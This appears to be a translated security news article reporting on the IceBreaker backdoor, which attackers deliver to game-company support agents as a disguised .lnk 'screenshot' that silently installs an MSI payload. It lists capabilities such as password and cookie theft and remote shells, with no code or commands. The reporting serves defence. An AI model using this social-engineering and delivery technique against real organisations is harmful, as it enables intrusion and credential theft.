Once again, social engineering is in demand, this time the attackers are fooling support agents.
Hacker groups have targeted online game development companies with a never-before-seen backdoor that the researchers have dubbed "IceBreaker".
The Security Joes Incident Response team believes that the IceBreaker backdoor uses "a very specific social engineering technique." The method is based on deceiving support agents. An attacker pretends to be a user who has encountered a problem and sends a malicious screenshot to an employee in a chat. Tom has no choice but to download and open the file, because you need to help the user. This is how the support agent infects his computer with a virus.
The name of the group behind these attacks is still unknown. However, according to Security Joes, this group has been using this approach since at least September 2022. At the same time, the only public evidence of the use of IceBreaker is a Twitter post from MalwareHunterTeam in October.
The malicious image is usually hosted on a fake website that pretends to be one of the popular hosts. Although the researchers also saw that the malicious screenshots were stored in the normal Dropbox storage.
The "image" itself is actually a malicious ".lnk" file. In fact, this is a regular Windows shortcut with malicious code in its parameters.
As you can see in the image above, the shortcut icon has been changed to look innocuous. The shortcut contains a command to download the payload in ".msi" format from the attacker's server, install it silently, and run it without a user interface.
Further along the path “AppData\Local\Temp”, the malicious application “Port.exe”, a 64-bit C++ executable file, is extracted.
After careful analysis, Security Joes found out that the sample is a completely new backdoor written in Node.js. It provides attackers with the following options:
setting up a backdoor using plugins that extend its built-in functions;
prescribing a backdoor to Windows startup;
Windows process detection;
stealing passwords and cookies from local storage, in particular from Google Chrome;
enable Socks5 reverse proxy;
uploading files to a remote server via web sockets;
running custom VBS scripts;
creating screenshots;
creating remote shell sessions.
If the target organization has not outsourced the customer support service to an external provider, but does it itself, attackers can use the backdoor to steal credentials, move in the internal network and expand their presence in it.
Currently, not much is known about IceBreaker, but Security Joes decided to publish this report and share all the indicators of compromise (IoC) found to help antivirus companies learn how to identify and eliminate the threat in a timely manner.